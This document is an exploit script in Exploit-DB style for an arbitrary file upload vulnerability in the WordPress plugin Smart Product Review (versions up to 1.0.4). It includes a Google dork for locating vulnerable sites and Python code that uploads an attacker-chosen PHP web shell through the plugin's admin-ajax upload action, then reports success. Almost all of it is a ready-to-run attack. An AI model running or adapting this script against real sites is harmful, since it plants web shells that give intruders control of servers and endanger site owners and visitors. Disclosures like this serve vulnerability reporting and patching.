# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload # Google Dork: inurl: /wp-content/plugins/smart-product-review/ # Date: 16/11/2021 # Exploit Author: Keyvan Hardani # Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/ # Version: <= 1.0.4 # Tested on: Kali Linux import os.path from os import path import json import requests; import time import sys def banner(): animation = "|/-\\" for i in range(20): time.sleep(0.1) sys.stdout.write("\r" + animation[i % len(animation)]) sys.stdout.flush() #do something print("Smart Product Review 1.0.4 - Arbitrary File Upload") print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)") def usage(): print("Usage: python3 exploit.py [target url] [your shell]") print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("No script kiddies please!!" in raw): return False; else: return True; def main(): banner() if(len(sys.argv) != 3): usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] ajax_action = 'sprw_file_upload_action' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'files[]' : open(file_path)} data = { "allowedExtensions[0]" : "jpg", "allowedExtensions[1]" : "php4", "allowedExtensions[2]" : "phtml", "allowedExtensions[3]" : "png", "qqfile" : "files", "element_id" : "6837", "sizeLimit" : "12000000", "file_uploader_nonce" : "2b102311b7" } print("Uploading Shell..."); response = requests.post(uri, files=files, data=data ) file_name = path.basename(file_path) if("ok" in response.text): print("Shell Uploaded!") print("Shell URL on your Review/Comment"); else: print("Shell Upload Failed") sys.exit(1) main();